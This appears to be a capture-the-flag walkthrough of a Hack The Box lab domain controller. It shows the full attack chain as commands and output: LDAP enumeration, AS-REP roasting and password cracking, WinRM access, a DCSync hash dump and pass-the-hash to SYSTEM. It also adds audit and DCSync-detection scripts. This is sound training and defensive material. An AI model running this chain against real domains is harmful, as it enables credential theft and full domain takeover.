Port scanning directly with masscan + nmap
```
┌──(bob㉿woo)-[~/Tools/AntSword-Loader-v4.0.3-linux-x64]
└─$ sudo masscan -p 1-65535 10.10.10.30 -e tun0 --rate=1000

Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-07-17 08:09:16 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 47001/tcp on 10.10.10.30
Discovered open port 49664/tcp on 10.10.10.30
Discovered open port 9389/tcp on 10.10.10.30
Discovered open port 49667/tcp on 10.10.10.30
Discovered open port 49671/tcp on 10.10.10.30
Discovered open port 49718/tcp on 10.10.10.30
Discovered open port 49666/tcp on 10.10.10.30
Discovered open port 49677/tcp on 10.10.10.30
Discovered open port 49683/tcp on 10.10.10.30
Discovered open port 135/tcp on 10.10.10.30
Discovered open port 3268/tcp on 10.10.10.30
Discovered open port 88/tcp on 10.10.10.30
Discovered open port 3269/tcp on 10.10.10.30
Discovered open port 53/tcp on 10.10.10.30
Discovered open port 49665/tcp on 10.10.10.30
Discovered open port 5985/tcp on 10.10.10.30
Discovered open port 139/tcp on 10.10.10.30
Discovered open port 445/tcp on 10.10.10.30
Discovered open port 49676/tcp on 10.10.10.30
Discovered open port 636/tcp on 10.10.10.30
Discovered open port 593/tcp on 10.10.10.30
Discovered open port 389/tcp on 10.10.10.30
Discovered open port 49698/tcp on 10.10.10.30
Discovered open port 464/tcp on 10.10.10.30
```
```
┌──(bob㉿woo)-[~/Tools/AntSword-Loader-v4.0.3-linux-x64]
└─$ nmap -sC -sV 10.10.10.30
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-17 16:12 CST
Stats: 0:00:11 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 67.60% done; ETC: 16:13 (0:00:05 remaining)
Stats: 0:00:20 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 93.35% done; ETC: 16:13 (0:00:01 remaining)
Stats: 0:00:35 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 27.27% done; ETC: 16:13 (0:00:16 remaining)
Stats: 0:00:50 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 81.82% done; ETC: 16:13 (0:00:05 remaining)
Nmap scan report for 10.10.10.30
Host is up (0.28s latency).
Not shown: 989 closed ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-07-17 15:20:57Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: PATHFINDER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h07m30s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2021-07-17T15:21:14
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.82 seconds
```
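One check worth making at this point: the nmap run above used its default top-1000 port list ("Not shown: 989 closed ports"), so it never probed several ports masscan found, including 5985/tcp (WinRM), which the rest of the walkthrough depends on. The script below is an added example, not part of the original post: it parses the masscan lines quoted above into a port list for nmap's `-p` option and reports which masscan hits the default nmap report left out. The two embedded text blocks are trimmed copies of the output shown above.

```python
# Added example, not from the original post: hand masscan's findings to nmap and
# check what a default (top-1000-port) nmap run leaves out. The two text blocks are
# the masscan and nmap output quoted above, trimmed to the lines that matter.
import re
from typing import List

MASSCAN_LINE = re.compile(r"Discovered open port (\d+)/(tcp|udp) on (\S+)")
NMAP_PORT_LINE = re.compile(r"^(\d+)/tcp\s+open", re.MULTILINE)

MASSCAN_OUTPUT = """\
Discovered open port 47001/tcp on 10.10.10.30
Discovered open port 49664/tcp on 10.10.10.30
Discovered open port 9389/tcp on 10.10.10.30
Discovered open port 49667/tcp on 10.10.10.30
Discovered open port 49671/tcp on 10.10.10.30
Discovered open port 49718/tcp on 10.10.10.30
Discovered open port 49666/tcp on 10.10.10.30
Discovered open port 49677/tcp on 10.10.10.30
Discovered open port 49683/tcp on 10.10.10.30
Discovered open port 135/tcp on 10.10.10.30
Discovered open port 3268/tcp on 10.10.10.30
Discovered open port 88/tcp on 10.10.10.30
Discovered open port 3269/tcp on 10.10.10.30
Discovered open port 53/tcp on 10.10.10.30
Discovered open port 49665/tcp on 10.10.10.30
Discovered open port 5985/tcp on 10.10.10.30
Discovered open port 139/tcp on 10.10.10.30
Discovered open port 445/tcp on 10.10.10.30
Discovered open port 49676/tcp on 10.10.10.30
Discovered open port 636/tcp on 10.10.10.30
Discovered open port 593/tcp on 10.10.10.30
Discovered open port 389/tcp on 10.10.10.30
Discovered open port 49698/tcp on 10.10.10.30
Discovered open port 464/tcp on 10.10.10.30
"""

NMAP_REPORT = """\
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP
3269/tcp open  tcpwrapped
"""


def masscan_ports(output: str) -> List[int]:
    """Unique open TCP ports reported by masscan, ascending."""
    return sorted({int(m.group(1)) for m in MASSCAN_LINE.finditer(output)
                   if m.group(2) == "tcp"})


def nmap_ports(report: str) -> List[int]:
    """Open TCP ports listed in the PORT table of an nmap report."""
    return sorted({int(m.group(1)) for m in NMAP_PORT_LINE.finditer(report)})


def nmap_p_arg(ports: List[int]) -> str:
    """Comma-separated value for nmap -p, so the service scan covers every masscan hit."""
    return ",".join(str(p) for p in ports)


def missed_by_nmap(masscan_output: str, nmap_report: str) -> List[int]:
    """Ports masscan found that the nmap report does not list."""
    return sorted(set(masscan_ports(masscan_output)) - set(nmap_ports(nmap_report)))


if __name__ == "__main__":
    ports = masscan_ports(MASSCAN_OUTPUT)
    print("nmap -sC -sV -p", nmap_p_arg(ports), "10.10.10.30")
    print("found by masscan, not probed by the default nmap run:",
          missed_by_nmap(MASSCAN_OUTPUT, NMAP_REPORT))
```

Against the output above, 13 of the 24 masscan ports are absent from the nmap report, so a second `nmap -sC -sV -p <list>` pass is the way to get service detection for 5985, 9389 and the high RPC ports rather than relying on masscan's port numbers alone.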
The target exposes a lot of ports, but the important ones are LDAP, kpasswd5 and kerberos-sec; together they tell us the target is an Active Directory server.
From nmap's results on the LDAP ports we also get the domain: MEGACORP.LOCAL0.
First, a word about the tool we will use, LDAPDomainDump: it is an Active Directory information-gathering tool that works over LDAP. In an Active Directory domain, any authenticated user can pull a large amount of valuable information via LDAP.
So the tool needs an authenticated user. Because the hosts in the Starting Point series are linked, the credential pair obtained on the previous target, sandra / Password1234!, comes in handy here:
```
┌──(bob㉿woo)-[~/Tools/AntSword-Loader-v4.0.3-linux-x64]
└─$ ldapdomaindump -u MEGACORP\\sandra -p Password1234! -o ldapinfo 10.10.10.30 --no-json --no-grep
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
```
The output is HTML. domain_users.html is shown below: there are 5 accounts, of which Guest, Administrator and krbtgt are default accounts, while sandra and svc_bes were created by users. Note that the svc_bes account carries the DONT_REQ_PREAUTH flag.
This touches on how Kerberos authentication works, so a brief introduction follows to make it easier to follow.
The figure above shows the Kerberos authentication flow. If a user's flags include DONT_REQ_PREAUTH, steps 2 and 3 of the authentication process are not required, which means a service ticket can be requested directly for that user.
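The flag ldapdomaindump surfaced is a single bit in the LDAP attribute `userAccountControl`, and it is the condition a domain owner should be auditing for. The script below is an added example, not part of the original post or of ldapdomaindump: it decodes `userAccountControl` values, lists enabled accounts that skip Kerberos pre-authentication, and builds the LDAP filter an administrator can run against the domain to find them. The flag bits and the bitwise-AND matching-rule OID are the documented Windows/LDAP constants; the numeric account values are constructed to mirror the five users in domain_users.html (the page shows only the flag name for svc_bes, not the raw values).

```python
# Added example, not from the original post: audit userAccountControl for accounts that
# skip Kerberos pre-authentication, the condition ldapdomaindump flagged on svc_bes.
# Flag bits and the matching-rule OID are documented constants; the account values
# below are constructed sample data modelled on the five users in domain_users.html.
from typing import Dict, List, Tuple

UAC_FLAGS: Dict[str, int] = {
    "SCRIPT": 0x0001,
    "ACCOUNTDISABLE": 0x0002,
    "PASSWD_NOTREQD": 0x0020,
    "NORMAL_ACCOUNT": 0x0200,
    "DONT_EXPIRE_PASSWORD": 0x10000,
    "TRUSTED_FOR_DELEGATION": 0x80000,
    "DONT_REQ_PREAUTH": 0x400000,
}

# LDAP extensible-match rule for a bitwise AND on an integer attribute.
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"


def decode_uac(value: int) -> List[str]:
    """Names of every known flag set in a userAccountControl value."""
    return [name for name, bit in UAC_FLAGS.items() if value & bit]


def no_preauth_filter() -> str:
    """LDAP filter for enabled user accounts with DONT_REQ_PREAUTH set (periodic audit query)."""
    rule = LDAP_MATCHING_RULE_BIT_AND
    return ("(&(objectCategory=person)(objectClass=user)"
            f"(userAccountControl:{rule}:={UAC_FLAGS['DONT_REQ_PREAUTH']})"
            f"(!(userAccountControl:{rule}:={UAC_FLAGS['ACCOUNTDISABLE']})))")


def accounts_without_preauth(accounts: List[Tuple[str, int]]) -> List[str]:
    """Enabled accounts for which the KDC will answer an AS-REQ without pre-authentication."""
    return [name for name, uac in accounts
            if uac & UAC_FLAGS["DONT_REQ_PREAUTH"]
            and not uac & UAC_FLAGS["ACCOUNTDISABLE"]]


# Constructed sample: (sAMAccountName, userAccountControl).
SAMPLE_ACCOUNTS: List[Tuple[str, int]] = [
    ("Administrator", 0x10200),  # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD
    ("Guest", 0x10222),          # ... | PASSWD_NOTREQD | ACCOUNTDISABLE
    ("krbtgt", 0x202),           # NORMAL_ACCOUNT | ACCOUNTDISABLE
    ("sandra", 0x10200),
    ("svc_bes", 0x410200),       # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD | DONT_REQ_PREAUTH
]

if __name__ == "__main__":
    for name, uac in SAMPLE_ACCOUNTS:
        print(f"{name:14} 0x{uac:06x} {decode_uac(uac)}")
    print("no pre-auth required:", accounts_without_preauth(SAMPLE_ACCOUNTS))
    print("audit filter:", no_preauth_filter())
```

The remediation is the mirror image of what the walkthrough exploits: clear "Do not require Kerberos preauthentication" on svc_bes unless a legacy client genuinely needs it, give any account that must keep the flag a long random password, and run the filter on a schedule so the flag cannot quietly reappear.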
Now we use GetNPUsers.py from the impacket toolkit to obtain the service ticket. If impacket is not installed yet, run the following to install it:
```
sudo -s
cd /opt && git clone https://github.com/SecureAuthCorp/impacket.git && cd impacket
sudo python3 -m pip install .
sudo python3 setup.py install
cd examples/
```
Use GetNPUsers to obtain the service ticket for svc_bes, output in a format john can consume.
The options used mean the following:
- `-request`: Requests TGT for users and output them in JtR/hashcat format (default False)
- `-no-pass`: Don't ask for password (useful for Kerberos authentication)
- `-dc-ip`: IP Address of the domain controller.
- `-format`: Format to save the AS_REQ of users without pre-authentication. Default is hashcat
john's cracking result is below; the svc_bes password is Sheffield19:
```
┌──(bob㉿woo)-[~/ldapinfo]
└─$ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:04 16.51% (ETA: 17:07:35) 0g/s 645043p/s 645043c/s 645043C/s yogismom..yoellia14
Sheffield19      ($krb5asrep$svc_bes@MEGACORP.LOCAL)
1g 0:00:00:15 DONE (2021-07-17 17:07) 0.06459g/s 684981p/s 684981c/s 684981C/s Sherbear94..Shawne116
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```
Now that we have the svc_bes password, and since the target has port 5985 open (WinRM, Windows Remote Management), we can use the evil-winrm tool for remote management; if it is not installed, install it with `gem install evil-winrm`. Once logged in, we can grab the user-level flag:
```
┌──(bob㉿woo)-[~/ldapinfo]
└─$ evil-winrm -u svc_bes -p Sheffield19 -i 10.10.10.30

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_bes> cd Desktop
*Evil-WinRM* PS C:\Users\svc_bes\Desktop> type user.txt
b05fb166688a8603d970c6d033f637f1
```
Drag the four JSON files collected with bloodhound-python into BloodHound and start analysing. Many queries are available, but the most useful here are Shortest Paths to High Value Targets and Find Principals with DCSync Rights. The result of Find Principals with DCSync Rights shows that svc_bes holds the GetChangesAll right over the domain controller, which means the account can ask the domain controller to replicate its data and thereby obtain sensitive information such as user hashes. Reference: https://blog.csdn.net/qianxiaoyiran311/article/details/106027299
We use secretsdump.py from the impacket toolkit to perform the DCSync attack and dump the NTLM hashes of every domain user. An NTLM credential consists of the domain name, the user name and an encrypted form of the password entered at the initial logon.
```
┌──(bob㉿woo)-[~/Zones]
└─$ secretsdump.py MEGACORP.LOCAL/svc_bes:Sheffield19@10.10.10.30
Impacket v0.9.24.dev1+20210625.150349.2eff99fc - Copyright 2021 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f9f700dbf7b492969aac5943dab22ff3:::
svc_bes:1104:aad3b435b51404eeaad3b435b51404ee:0d1ce37b8c9e5cf4dbd20f5b88d5baca:::
sandra:1105:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
PATHFINDER$:1000:aad3b435b51404eeaad3b435b51404ee:70f577ff8a6a3fdc985b9933b0964beb:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:056bbaf3be0f9a291fe9d18d1e3fa9e6e4aff65ef2785c3fdc4f6472534d614f
Administrator:aes128-cts-hmac-sha1-96:5235da455da08703cc108293d2b3fa1b
Administrator:des-cbc-md5:f1c89e75a42cd0fb
krbtgt:aes256-cts-hmac-sha1-96:d6560366b08e11fa4a342ccd3fea07e69d852f927537430945d9a0ef78f7dd5d
krbtgt:aes128-cts-hmac-sha1-96:02abd84373491e3d4655e7210beb65ce
krbtgt:des-cbc-md5:d0f8d0c86ee9d997
svc_bes:aes256-cts-hmac-sha1-96:2712a119403ab640d89f5d0ee6ecafb449c21bc290ad7d46a0756d1009849238
svc_bes:aes128-cts-hmac-sha1-96:7d671ab13aa8f3dbd9f4d8e652928ca0
svc_bes:des-cbc-md5:1cc16e37ef8940b5
sandra:aes256-cts-hmac-sha1-96:2ddacc98eedadf24c2839fa3bac97432072cfac0fc432cfba9980408c929d810
sandra:aes128-cts-hmac-sha1-96:c399018a1369958d0f5b242e5eb72e44
sandra:des-cbc-md5:23988f7a9d679d37
PATHFINDER$:aes256-cts-hmac-sha1-96:63f54baad343b721e1fafb11f02df20e6ad06292cab9db214338f5bc02de094a
PATHFINDER$:aes128-cts-hmac-sha1-96:03e78b35c1feb2be71b7953087333648
PATHFINDER$:des-cbc-md5:61b091839ee9e35d
[*] Cleaning up...
```
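What secretsdump did here ("Using the DRSUAPI method") is indistinguishable on the wire from a domain controller replicating, which is exactly why a defender keys detection on who asked rather than on what was asked. Windows records each such request as Security event 4662 with the replication control-access GUIDs in its Properties field, and a request from anything other than a known replication principal is the signal. The script below is an added example, not part of the original post or of impacket: it parses flattened 4662-style records and raises an alert for non-allow-listed accounts exercising the replication rights BloodHound reported. The three GUIDs are the documented Active Directory control-access rights; the event strings are constructed stand-ins for real 4662 records, and the allow-list holding only PATHFINDER$ (the DC machine account from the dump above) is an assumption for this lab domain.

```python
# Added example, not from the original post: spot DCSync-style replication requests in
# Windows Security event 4662. A DCSync run such as the secretsdump.py call above asks the
# DC for directory replication, which is audited with access mask 0x100 and the replication
# control-access GUIDs in the Properties field. The event texts below are constructed,
# flattened stand-ins for real 4662 records; the allow-list is an assumption for this lab.
import re
from typing import Dict, List

# Control-access right GUIDs that DCSync exercises (documented Windows constants).
REPLICATION_RIGHTS: Dict[str, str] = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Principals that legitimately replicate. Here only the DC machine account seen in the dump;
# a production list also carries the other DCs and sync services such as Azure AD Connect.
ALLOWED_REPLICATORS = {"PATHFINDER$"}

FIELDS = ("EventID", "Account Name", "Access Mask", "Properties")


def parse_4662(event: str) -> Dict[str, str]:
    """Extract the fields we need from a 'Key: value; Key: value' event string."""
    parsed: Dict[str, str] = {}
    for key in FIELDS:
        m = re.search(rf"{re.escape(key)}:\s*([^;\n]+)", event)
        if m:
            parsed[key] = m.group(1).strip()
    return parsed


def replication_rights(properties: str) -> List[str]:
    """Names of the replication rights whose GUIDs appear in the Properties field."""
    props = properties.lower()
    return [name for guid, name in REPLICATION_RIGHTS.items() if guid in props]


def dcsync_alerts(events: List[str]) -> List[str]:
    """One alert per 4662 event in which a non-allow-listed account used a replication right."""
    alerts: List[str] = []
    for event in events:
        fields = parse_4662(event)
        if fields.get("EventID") != "4662":
            continue
        rights = replication_rights(fields.get("Properties", ""))
        if not rights:
            continue  # some other directory access, not replication
        account = fields.get("Account Name", "")
        if account in ALLOWED_REPLICATORS:
            continue  # expected DC-to-DC replication
        alerts.append(f"{account} requested {', '.join(rights)}")
    return alerts


# Constructed sample events: normal DC replication, a DCSync by svc_bes, an unrelated 4662
# on a different GUID, and a logon event that the detector must ignore.
SAMPLE_EVENTS = [
    "EventID: 4662; Account Name: PATHFINDER$; Access Mask: 0x100; "
    "Properties: {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID: 4662; Account Name: svc_bes; Access Mask: 0x100; "
    "Properties: {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID: 4662; Account Name: sandra; Access Mask: 0x100; "
    "Properties: {bf967a86-0de6-11d0-a285-00aa003049e2}",
    "EventID: 4624; Account Name: svc_bes; Logon Type: 3",
]

if __name__ == "__main__":
    for line in dcsync_alerts(SAMPLE_EVENTS):
        print("ALERT:", line)
```

Two operational notes: 4662 is only written if "Audit Directory Service Access" is enabled and the domain naming context carries a SACL for these control-access rights, so the first step is confirming the events exist at all; and the root cause on this box is the ACL itself, so the lasting fix is removing GetChangesAll from svc_bes and reviewing who else holds replication rights on the domain object.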
With the Administrator hash recovered by secretsdump, a pass-the-hash (PtH) attack gives us access to the system, here via psexec.py from the impacket toolkit:
```
┌──(bob㉿woo)-[~/Zones]
└─$ psexec.py MEGACORP.LOCAL/Administrator@10.10.10.30 -hashes aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18
Impacket v0.9.24.dev1+20210625.150349.2eff99fc - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on 10.10.10.30.....
[*] Found writable share ADMIN$
[*] Uploading file yFPortAS.exe
[*] Opening SVCManager on 10.10.10.30.....
[*] Creating service fReT on 10.10.10.30.....
[*] Starting service fReT.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Users\Administrator\Desktop>type root.txt
ee613b2d048303e5fd4ac6647d944645
```
References:
https://shapmanasick.gitbook.io/starting-point-htb/pathfinder-walkthrough
https://blog.csdn.net/qianxiaoyiran311/article/details/106027299